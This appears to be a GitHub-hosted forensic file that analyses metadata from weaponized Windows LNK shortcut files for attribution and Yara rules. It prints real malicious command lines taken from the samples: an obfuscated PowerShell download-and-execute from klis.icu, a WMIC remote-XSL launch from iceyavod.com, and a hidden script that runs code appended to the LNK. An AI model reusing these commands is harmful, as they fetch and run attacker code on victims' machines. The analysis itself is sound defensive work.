-
Notifications
You must be signed in to change notification settings - Fork 6
/
other.txt
157 lines (133 loc) · 7.58 KB
/
other.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
Metadata from weaponized LNK files can provide insight into the actor's development
environment. The SID provides insight into the user account used, and can be used as
a search string (as well as in a Yara rule). The volume serial number, machine ID (aka,
NetBIOS name), and the node ID (aka, MAC address) can also be used in a Yara rule.
-------------------------------------------------------------------------------------
https://www.virustotal.com/gui/file/3b4ec70681e528663dee39c5c6ebceec2b7ddf09707a78df20cae3b7b807fac5/detection
MD5: 5d357f666e7727b18f8150d53d28d257
Metadata:
guid {00021401-0000-0000-c000-000000000046}
mtime Wed Apr 11 23:35:27 2018 Z
atime Wed Apr 11 23:35:27 2018 Z
ctime Wed Apr 11 23:35:27 2018 Z
workingdir %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
basepath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
description AVI
shitemidlist My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe
**Shell Items Details (times in UTC)**
C:2018-04-11 21:04:34 M:2018-11-16 21:29:56 A:2018-11-16 21:29:56 Windows (9)
C:2018-04-11 21:04:34 M:2018-11-21 17:32:02 A:2018-11-21 17:32:02 System32 (9)
C:2018-04-11 23:38:22 M:2018-04-11 23:38:22 A:2018-06-28 23:05:46 WindowsPowerShell (9)
C:2018-04-11 23:38:22 M:2018-06-28 23:04:20 A:2018-06-28 23:04:20 v1.0 (9)
C:2018-04-11 23:35:28 M:2018-04-11 23:35:28 A:2018-04-11 23:35:28 powershell.exe (9)
vol_sn CA05-2569
vol_type Fixed Disk
commandline -NoPr -WINd 1 -eXEc ByP iex ("$( SeT-ITeM 'VariaBle:OFS' '')"+[StRING][CHAr[]] (73 ,69, 88, 40, 78,101 , 119 , 45, 79 ,98,106,101 , 99,116,32 ,83,121,115 ,116 ,101 ,109, 46, 78 , 101,116,46,87 , 101, 98 ,67,108 ,105 , 101 , 110 , 116, 41,46 , 68,111 ,119 ,110, 108, 111,97 , 100, 83 , 116 ,114,105,110,103 ,40, 39, 104 ,116 ,116,112,58 ,47 ,47,107 ,108 ,105, 115 ,46 ,105 , 99 , 117,47 ,49 , 39,41)+"$(SEt-VARiAbLe 'OfS' ' ' ) ")
iconfilename C:\WINDOWS\System32\imageres.dll
hotkey 0x0
showcmd 0x7
***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasExpIcon|HasLinkInfo|HasArguments|HasName|HasIconLocation|HasRelativePath
***PropertyStoreDataBlock***
GUID/ID pairs:
{446d16b1-8dad-4870-a748-402ea43d788c}/104
{46588ae2-4cbc-4338-bbfc-139326986dce}/4 SID: S-1-5-21-1607665944-3235443811-1991609163-1001
***KnownFolderDataBlock***
GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM
***TrackerDataBlock***
Machine ID : x10-slim
New Droid ID Time : Sun Jul 29 22:57:38 2018 UTC
New Droid ID Seq Num : 5969
New Droid Node ID : e8:9e:b4:3a:a3:ea
Birth Droid ID Time : Sun Jul 29 22:57:38 2018 UTC
Birth Droid ID Seq Num: 5969
Birth Droid Node ID : e8:9e:b4:3a:a3:ea
-------------------------------------------------------------------------------------
https://www.virustotal.com/gui/file/695e03c97eaed0303c9527e579e69b1ba280c448476edcf97d7a289b439fa39a/detection
https://hybrid-analysis.com/sample/695e03c97eaed0303c9527e579e69b1ba280c448476edcf97d7a289b439fa39a?environmentId=100
MD5: 0b12bdcfa497422aedf092729325ff6d
Note: In this LNK file, the time stamps within the shell items were visually/manually
verified as being zero'd out. There also appear to be other modifications to the file,
as well, as well as a description field.
Metadata:
guid {00021401-0000-0000-c000-000000000046}
description 44OFxmd8rhESizmd7i26IOKcvjd7gt6IFqcv
shitemidlist My Computer/C:\/WINDOWS/system32/cmd.exe
**Shell Items Details (times in UTC)**
C:0 M:0 A:0 WINDOWS (9)
C:0 M:0 A:0 system32 (9)
C:0 M:0 A:0 cmd.exe (9)
commandline /k start /MIN %SystemRoot%\\system32\\wbem\\WMIC.exe os get /format:"http://t9UHncbrj.iceyavod.com:25073/03/vv.xsl?13102507390dOIrmxm" && exit
iconfilename %SystemRoot%\system32\imageres.dll
hotkey 0x0
showcmd 0x7
***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasArguments|HasName|HasIconLocation
***PropertyStoreDataBlock***
GUID/ID pairs:
{46588ae2-4cbc-4338-bbfc-139326986dce}/4 SID: S-1-5-21-1051504378-1802116228-1550938009-1001
***KnownFolderDataBlock***
GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM
-------------------------------------------------------------------------------------
LNK avialable for download:
https://iris-h.services/#/pages/workbench/19cd922cac02acd24b7b6c3d01df5b0b29f52eab
This LNK file is interesting, in that the actual command run is appended to the end
of the LNK file itself. In this case, the word "dikona" is used throughout the script.
Windows Defender detects that LNK file as BITS abuse, as the embedded script uses
bitsadmin.exe to download a file.
MD5: 877a283be8cd033a144f9d3324e7a0b0
Metadata:
guid {00021401-0000-0000-c000-000000000046}
mtime Tue Jul 14 01:39:20 2009 Z
atime Mon Jul 13 23:49:07 2009 Z
ctime Mon Jul 13 23:49:07 2009 Z
basepath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
shitemidlist My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe
**Shell Items Details (times in UTC)**
C:2009-07-14 03:20:10 M:2018-09-07 06:18:28 A:2018-09-07 06:18:28 Windows (8)
C:2009-07-14 03:20:12 M:2018-09-07 06:12:28 A:2018-09-07 06:12:28 System32 (8)
C:2009-07-14 05:32:40 M:2009-07-14 05:32:40 A:2009-07-14 05:32:40 WindowsPowerShell (8)
C:2009-07-14 05:32:40 M:2016-12-19 11:50:30 A:2016-12-19 11:50:30 v1.0 (8)
C:2009-07-13 23:49:08 M:2009-07-14 01:39:22 A:2009-07-13 23:49:08 powershell.exe (8)
vol_sn 9CBC-E47E
vol_type Fixed Disk
commandline -ep bypass -c "&{powershell -w"in hi"d"den -c {$g=findstr /s dikona $env:userprofile\*.lnk;powershell -c $g}}"
iconfilename shell32.dll
hotkey 0x73
showcmd 0x7
***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath
***PropertyStoreDataBlock***
GUID/ID pairs:
{46588ae2-4cbc-4338-bbfc-139326986dce}/4 SID: S-1-5-21-2287413414-4262531481-1086768478-1000
***KnownFolderDataBlock***
GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM
***TrackerDataBlock***
Machine ID : pc
New Droid ID Time : Fri Sep 9 16:24:17 2016 UTC
New Droid ID Seq Num : 7251
New Droid Node ID : 08:d4:0c:47:f8:73
Birth Droid ID Time : Fri Sep 9 16:24:17 2016 UTC
Birth Droid ID Seq Num: 7251
Birth Droid Node ID : 08:d4:0c:47:f8:73
-------------------------------------------------------------------------------------
Below is the metadata for "make_lnk.lnk", a custom crafted LNK file that includes only the
minimum required for a functioning LNK file. The LNK file metadata was further modified to
remove time stamps from the shell items, as well as modify the version number for the shell
items.
The file can be found here: https://github.com/keydet89/LNK/blob/master/make_lnk.txt
Note that the file extension was changed to "txt".
File: d:\cases\lnk\make_lnk.lnk
guid {00021401-0000-0000-c000-000000000046}
shitemidlist My Computer/C:\/Windows/System32 /calc.exe
**Shell Items Details (times in UTC)**
C:0 M:0 A:0 Windows (10)
C:0 M:0 A:0 System32 (10)
C:0 M:0 A:0 calc.exe (10)
hotkey 0x0
showcmd 0x1
***LinkFlags***
HasLinkTargetIDList|IsUnicode